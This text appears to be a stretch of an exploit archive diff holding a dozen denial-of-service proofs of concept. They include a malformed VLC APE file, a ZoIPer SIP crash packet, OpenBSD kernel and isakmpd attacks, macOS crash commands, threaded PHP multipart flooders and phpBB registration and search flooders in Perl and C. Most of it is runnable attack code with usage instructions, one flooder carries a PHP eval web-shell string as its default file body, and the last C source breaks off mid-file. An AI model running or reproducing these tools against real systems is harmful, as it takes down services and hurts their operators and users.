# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat APE file ( Monkey's Audio Format )
# => 2 - Open APE file With VLC 1.0.5
# => 3 - Crashed !!!
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |===========================================================|\n";
print " |= [!] Name : VLC media player v1.0.5 (Monkey's File) =|\n";
print " |= [!] Exploit : Local Crash PoC =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |===========================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
# Greets All My Friends (cit<69> 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers .
# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker .
#===============================================================================

70
platforms/multiple/dos/9987.txt Executable file
View file

@ -0,0 +1,70 @@
#!/usr/bin/python
# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars: \x20 , \x09
import sys
import socket
import os
def main(argc , argv):
if len(sys.argv) != 2:
os.system("cls")
sys.exit("Usage: " + sys.argv[0] + " <target_ip>\n")
target_host = sys.argv[1]
target_port = 5060
evil_packet = "\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
"\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
"\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
"\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
"\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
"\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
"\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
"\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
"\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
"\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
"\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
"\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
"\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
"\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
"\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
"\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
"\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
"\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
"\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
"\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
"\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
"\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
"\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"
os.system("cls")
print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
print "[+] Exploited By Gr33n_G0bL1n\r\n"
print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((target_host,target_port))
print "[+] Trying To Send Evil Packet...\r\n"
s.sendall(evil_packet)
s.close()
print "[+] Done!\r\n"
except:
print "[x] Connection Error!\r\n"
if (__name__ == "__main__"):
sys.exit(main(len(sys.argv), sys.argv))

7
platforms/novell/dos/19541.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/700/info
Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer.
nmap -sS -p 427 <target>

129
platforms/openbsd/dos/21167.c Executable file
View file

@ -0,0 +1,129 @@
source: http://www.securityfocus.com/bid/3612/info
OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation.
Under some conditions, an application launched by a regular user on the system can cause a system crash. When an application on an OpenBSD system attempts to pipe a NULL value, a fault in the kernel causes the system to crash immediately.
This make it possible for a malicious local user to deny service to legitimate users of the system.
/* obsd-crashme.c - by Marco Peereboom <marcodsl@swbell.net> */
/* December 03, 2001 */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
#include <signal.h>
#include <stdarg.h>
#include <syslog.h>
/* globals */
int fd[8]; /* temp pipe file descriptors */
int fd_real[4]; /* real pipe's */
static int __DEBUG__ = 0;
static int __SYSLOG__ = 0;
void enable_debug(void)
{
__DEBUG__ = 1;
}
void disable_debug(void)
{
__DEBUG__ = 0;
}
void enable_syslog(void)
{
__SYSLOG__ = 1;
}
void disable_syslog(void)
{
__SYSLOG__ = 0;
}
void s_fprintf(FILE *file, const char *fmt, ...)
{
va_list ap;
if (__DEBUG__) {
fflush(file);
va_start(ap, fmt);
vfprintf(file, fmt, ap);
va_end(ap);
fflush(file);
}
if (__SYSLOG__) {
va_start(ap, fmt);
vsyslog(LOG_INFO, fmt, ap);
va_end(ap);
}
}
void *s_malloc(size_t size)
{
char serr[40]; /* can not allocate more mem so lets use this
ugly beast */
void *p;
if (__DEBUG__ || __SYSLOG__) {
s_fprintf(stderr, "PID=%-5i PPID=%-5i: malloc(%i)\n",
getpid(), getppid(), size);
}
if ((p = malloc(size)) == NULL ) {
sprintf(serr,"PID=%i, Could not allocate memory",
getpid());
perror(serr);
exit(6);
}
return p;
}
void s_perror(const char *str)
{
char *buf;
if (__DEBUG__ || __SYSLOG__) {
s_fprintf(stderr, "PID=%-5i PPID=%-5i: perror(%s)\n",
getpid(), getppid(), str);
}
buf = s_malloc(11 + strlen(str)); /* PID=%-5i = 11 chars */
sprintf(buf, "PID=%-5i %s", getpid(), str);
perror(buf);
free(buf);
}
void s_pipe(int *fd)
{
if (__DEBUG__ || __SYSLOG__) {
s_fprintf(stderr, "PID=%-5i PPID=%-5i: pipe(%x)\n",
getpid(), getppid(), (unsigned int)fd);
}
if (pipe(fd) == -1)
{
s_perror("Could not create pipe");
exit(3);
}
}
int main(int argc, char **argv)
{
enable_debug();
enable_syslog();
fprintf(stderr, "Before pipe\n");
s_pipe(NULL); /* test if s_pipe exits */
fprintf(stderr, "Will never reach this\n");
return 0;
}

44
platforms/openbsd/dos/24181.sh Executable file
View file

@ -0,0 +1,44 @@
source: http://www.securityfocus.com/bid/10496/info
It is reported that OpenBSD's isakmpd daemon is susceptible to a remote denial of service vulnerability.
An attacker is able to delete security associations and policies from IPSec VPN's by sending a malformed UDP ISAKMP packet to a vulnerable server. The malformed packet contains payloads for both setting up a new tunnel and deleting a tunnel. Isakmpd improperly acts upon the delete payload and terminates the associations and policys relating to the tunnel.
It is possible to destroy security associations, effectively eliminating the VPN connection between gateways, denying service to legitimate users of the VPN.
#!/bin/sh
if [ ! $# -eq 3 ]; then
echo "usage: $0 fake_src victim spi";
exit;
fi
src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
dnet hex \
$cky_i \
"\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x08\x10\x05\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x5c" \
"\x01\x00\x00\x04" \
"\x0c\x00\x00\x2c" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x20" \
"\x01\x01\x00\x01" \
"\x00\x00\x00\x18" \
"\x00\x01\x00\x00" \
"\x80\x01\x00\x05" \
"\x80\x02\x00\x02" \
"\x80\x03\x00\x01" \
"\x80\x04\x00\x02" \
"\x00\x00\x00\x10" \
"\x00\x00\x00\x01" \
"\x03\x04\x00\x01" \
$spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send

14
platforms/osx/dos/20845.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/2716/info
Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections.
It is possible to log in remotely to the server and shut down the service by making a directory with a name that is 65 characters long. Users must be authenticated to engage this attack.
ftp host
user anonymous
pass anonymous
mkdir
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa

7
platforms/osx/dos/22074.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/6331/info
Mac OS X is the BSD-derived operating system distributed and maintained by Apple Sofware.
It has been reported that a denial of service exists in OS X. When a user creates a directory, descends it, creates another directory of the same name, then attempts to move the directory up one level in the hierarchy, the system reacts unpredictably. It has been reported that this can cause a crash of the system.
mkdir ~/mydir; cd ~/mydir; mkdir mydir; mv mydir ..

48
platforms/osx/dos/9845.c Executable file
View file

@ -0,0 +1,48 @@
/*
Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS
==================================================
This code should be run in a loop and due to problems
with mutex handling in ptrace a DoS can occur when a
destroyed mutex is attempted to be interlocked by OSX
kernel giving rise to a race condition. You may need
to run this code multiple times.
- Tested against 10.5.6
- Tested against 10.5.7
- Tested against 10.6.1
while `true`;do ./prdelka-vs-APPLE-ptracepanic;done
-- prdelka
*/
#include <sys/types.h>
#include <sys/ptrace.h>
#include <stdio.h>
#include <stdlib.h>
int main(){
pid_t pid;
char *argv[] = {"id","","",0};
char *envp[] = {"",0};
pid = fork();
if(pid == 0){
usleep(100);
execve("/usr/bin/id",argv,envp);
}
else{
usleep(820);
if(ptrace(PT_ATTACH,pid,0,0)==0){
printf("[ PID: %d has been caught!\n",pid);
if(ptrace(PT_DETACH,pid,0,0)<0){
perror("Evil happens.");
}
usleep(1);
wait(0);
}
else{
perror("Fail!");
}
}
return(0);
}

173
platforms/php/dos/10242.txt Executable file
View file

@ -0,0 +1,173 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Author:
# Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20
# http://www.pardus.org.tr/eng/
#
# Credits:
# Bogdan Calin from Acunetix
#
# Description:
# Exploit to cause denial of service on any host that runs PHP via temporary
# file exhaustion. It doesn't matter whether the script handles uploads or not.
# If host runs PHP, it is enough to cause DoS using any PHP script it serves.
#
# This is the implementation of disclosed vulnerability that was found
# by Bogdan Calin. See: http://www.acunetix.com/blog/websecuritynews/php-multipartform-data-denial-of-service/
#
# Affected versions:
# All PHP versions before PHP 5.3.1 and unpatched 5.2.11
#
# Platforms:
# Windows, Linux, Mac
#
# Fix:
# Update to 5.3.1. If you use 5.2.11 and can't update, apply the patch [0]:
#
# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/rfc1867.c?r1=272374&r2=289990&view=patch (introduce max_file_upload)
# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c?r1=289214&r2=289990&view=patch (NOTE: upstream changed 100 to 20, do it so)
#
# Usage:
# python php-multipart-dos.py <site> <port> </index.php> <num of child: optional>
#
# After opening childs, you may wait long for threads to finish because sending such a huge data is painful.
# However, it's not important to finish the request. Openining lots of connections and sending huge data fastly will enough to cause DoS.
# So the more threads you spawn, the more impact you will make. In normal cases, spawning 150 childs would be enough. But the number depends on you.
# Trial and error ;))
#
# Example:
# python php-multipart-dos.py www.example.com 8080 /index.php
#
# By defalt, the program will create 100 threads, each thread will send 10 requests.
# You can specify child number to create, you may want to increase or decrease for the impact, etc..
#
# python php-multipart-dos.py www.example.com 80 /~user/index.php 50
#
# Notes:
# This script is for educational purposes only. Use it at your OWN risk!
import socket
import random
import time
import threading
import sys
class Connection:
def __init__(self, host, port):
self._host = host
self._port = port
self.sock = None
def connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self._host, self._port))
def send(self, msg):
if not self.sock:
raise "NotConnected"
else:
self.sock.send(msg)
def close(self):
self.sock.close()
class Exploit (threading.Thread):
def __init__(self, host, port, target):
self._host = host
self._port = port
self._target = target
threading.Thread.__init__(self)
def getBoundary(self):
""" Return random boundary data """
random.seed()
rnd = random.randrange(100000, 100000000)
data = "---------------------------%s" % rnd
return data
def createPayload(self):
data = """POST %(target)s HTTP/1.1\r
Host: %(host)s\r
Uset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\r
Connection: keep-alive\r
Content-Type: multipart/form-data; boundary=%(boundary)s\r
Content-Length: %(length)s\r\n\r\n"""
boundary = self.getBoundary()
# Create a number of upload data, 16.000, yeah! :)
for i in range(16000):
data += "--%s\r\n" % boundary
data += """Content-Disposition: form-data; name="file_%s"; filename="file_%s.txt"\r
Content-Type: text/plain\r\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\n\r\n""" % (i, i)
data += "--%s--\r\n" % boundary
return data % {"host": self._host, "target": self._target, "boundary": boundary, "length": str(len(data))}
def run(self):
payload = self.createPayload()
for i in range(0, 10):
c = Connection(self._host, self._port)
c.connect()
c.send(payload)
c.close()
sys.exit(0)
del payload
sys.exit(0)
def usage():
usage_data = """
__^__ __^__
( ___ )------------------------------------------------( ___ )
| / | | \ |
| / | Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 | \ |
| / | http://www.pardus.org.tr/eng/ | \ |
|___| |___|
(_____)------------------------------------------------(_____)
PHP denial of service exploit via temporary file exhaustion
Usage: python php-multipart-dos.py <host> <port> </adress/index.php> <child number: optional>
See source code for more information
"""
print usage_data
if __name__ == '__main__':
if not len(sys.argv) >= 4:
usage()
else:
# is child number passed?
if len(sys.argv) >= 5:
child = int(sys.argv[4])
else:
child = 100
print "[+] Attack started..."
for i in range(0, child):
try:
exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3]))
exp.start()
print "[+] Opening %s childs... [%s]\r" % (child, i+1),
sys.stdout.flush()
i += 1
except KeyboardInterrupt:
print "\n[-] Keyboard Interrupt. Exiting..."
sys.exit(1)
# print it so that previous "Opening childs..." is still there
print ""
while True:
try:
activeChilds = threading.activeCount()
print "[+] Waiting for childs to finish. %d remaining...\r" % activeChilds,
sys.stdout.flush()
# we have one main process
if activeChilds == 1:
print "\nOK!"
sys.exit(0)
except KeyboardInterrupt:
print "\n[-] Exiting without waiting!"
sys.exit(1)

112
platforms/php/dos/10243.txt Executable file
View file

@ -0,0 +1,112 @@
#!/usr/bin/python
# PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009
# Bogdan Calin (bogdan@acunetix.com)
#
import httplib, urllib, sys, string, threading
from string import replace
from urlparse import urlparse
def usage():
print "****************************************************************************"
print " PHP MultiPart Form-Data Denial of Service proof of concept"
print " Bogdan Calin (bogdan@acunetix.com)"
print ""
print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]"
print ""
print " [number_of_threads] - optional, default 10"
print " [number_of_files] - optional, default 15000"
print " [data] - content of the files, by default it will create files containing"
print " the string <?php eval($_REQUEST[x]); ?>"
print ""
print " Example: php_mpfd_dos.py http://ubuntu/index.php"
print "****************************************************************************"
class PhpMPFDDosThread ( threading.Thread ):
# Override Thread's __init__ method to accept the parameters needed:
def __init__ ( self, host, path, files ):
self.host = host
self.path = path
self.files = files
threading.Thread.__init__ ( self )
# run in loop
def run(self):
while(1):
try:
self.post_data()
except:
print "*",
# post multipart_formdata
def post_data(self):
content_type, body = self.encode_multipart_formdata()
h = httplib.HTTPConnection(self.host)
headers = {
'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)',
'Accept': '*/*',
'Content-Type': content_type
}
h.request('POST', self.path, body, headers)
print ".",
# encode multipart_formdata
def encode_multipart_formdata(self):
"""
adapted from http://code.activestate.com/recipes/146306/
files is a sequence of (name, filename, value) elements for data to be uploaded as files
Return (content_type, body) ready for httplib.HTTP instance
"""
BOUNDARY = '----------PHP_MPFD_DOS'
CRLF = '\r\n'
L = []
for (key, filename, value) in self.files:
L.append('--' + BOUNDARY)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
L.append('Content-Type: application/octet-stream')
L.append('')
L.append(value)
L.append('--' + BOUNDARY + '--')
L.append('')
body = CRLF.join(L)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def main():
if len(sys.argv)<=1:
usage()
sys.exit()
# default values
number_of_threads = 10
number_of_files = 15000
data = "<?php eval($_REQUEST[x]); ?>"
if len(sys.argv)>2:
number_of_threads = int(sys.argv[2])
if len(sys.argv)>3:
number_of_files = int(sys.argv[3])
if len(sys.argv)>4:
data = sys.argv[4]
url = sys.argv[1]
print "[-] target: " + url
# parse target url
up = urlparse(url)
host = up.netloc
path = up.path
# prepare files
files = []
for i in range(0, number_of_files):
files.append(('fu[]', 'f'+str(i), data))
# start the threads
for x in xrange ( number_of_threads ):
PhpMPFDDosThread(host, path, files).start()
if __name__ == '__main__':
main()

146
platforms/php/dos/1063.pl Executable file
View file

@ -0,0 +1,146 @@
#!/usr/bin/perl
## Name: NsT-phpBBDoS (Perl Version)
## Copyright: Neo Security Team
## Author: HaCkZaTaN
## Ported: g30rg3_x
## Date: 20/06/05
## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
## A Simple phpBB Registration And Search DoS Flooder.
##
## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
## [+]
## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
## [+] ported to Perl By g30rg3_x
## [+] Neo Security Team
## [+]
## [+] Host |without http://www.| victimshost.com
## [+] Path |example. /phpBB2/ or /| /phpBB2/
## [+] Flood Type |1=Registration 2=Search| 1
## [+] ..........................................................
## [+] ..........................................................
## [+] ..........................................................
## [+] ..............................................
## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"
use IO::Socket;
## Initialized X
$x = 0;
## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);
print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);
print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);
## If Type Is Equals To 1 or Registration
if($type == 1){
## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Building User in base X
$uname = "username=NsT__" . "$x";
## Building User Mail in base X
$umail = "&email=NsT__" . "$x";
## Final String to Send
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
## If Type Is Equals To 2 or Search
}
elsif ($type == 2){
## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???\n";
}
# milw0rm.com [2005-06-22]

248
platforms/php/dos/1064.c Executable file
View file

@ -0,0 +1,248 @@
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06
--------------------------------------------------------
Program: phpBB 2.0.15
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.15 & Lower versions
Risk: High Risk!!
Impact: Multiple DoS Vulnerabilities.
-==phpBB 2.0.15 Multiple DoS Vulnerabilities ==-
---------------------------------------------------------
- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.
- Tested
---------------------------------------------------------
localhost & many forums
- Explotation
---------------------------------------------------------
profile.php << By registering as many users as you can.
search.php << by searching in a way that the db couln't observe it.
- Exploit
---------------------------------------------------------
[C Source]
/*
Name: NsT-phpBBDoS
Copyright: NeoSecurityteam
Author: HaCkZaTaN
Date: 19/06/05
Description: xD You must figure out the problem xD
root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]
[*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>
[*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]
.................................
root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
MACHTYPE=i486-slackware-linux-gnu
root@NeoSecurity:/home/hackzatan#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define __USE_GNU
#define _XOPEN_SOURCE
int Connection(char *, int);
void Write_In(int , char *, char *a, char *, int);
char Use(char *);
int main(int argc, char *argv[])
{
int sock, x = 0;
char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];
puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN");
puts("[+] NeoSecurityTeam");
puts("[+] Dos has begun....[+]\n");
fflush(stdout);
if(argc != 4) Use(argv[0]);
while(1)
{
sock = Connection(Host,80);
Write_In(sock, Path, Pro_Sea, Host, x);
#ifndef WIN32
shutdown(sock, SHUT_WR);
close(sock);
#else
closesocket(sock);
WSACleanup();
#endif
Pro_Sea = argv[2];
x++;
}
//I don't think that it will get here =)
return 0;
}
int Connection(char *Host, int Port)
{
#ifndef WIN32
#define SOCKET int
#else
int error;
WSADATA wsadata;
error = WSAStartup(MAKEWORD(2, 2), &wsadata);
if (error == SOCKET_ERROR)
{
perror("Could Not Start Up Winsock!\n");
return;
}
#endif
SOCKET sockfd;
struct sockaddr_in sin;
struct in_addr *myaddr;
struct hostent *h;
if(Port <= 0 || Port > 65535)
{
puts("[-] Invalid Port Number\n");
fflush(stdout);
exit(-1);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket() ");
fflush (stdout);
exit(-1);
}
if(isalpha(Host[0]))
{
if((h = gethostbyname(Host)) == NULL)
{
perror("gethostbyname() ");
fflush (stdout);
exit(-1);
}
}
else
{
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(Host);
if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
{
perror("gethostbyaddr() ");
fflush (stdout);
exit(-1);
}
}
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(Port);
memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
{
perror("connect() ");
exit (-1);
}
return sockfd;
}
void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
{
char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);
char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n"
"Accept: */*\r\n"
"Accept-Language: en-us\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Accept encoding: gzip,deflate\r\n"
"Keep-Alive: 300\r\n"
"Proxy-Connection: keep-alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Cache-Control: no-cache\r\n"
"Pragma: no-cache\r\n";
char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n";
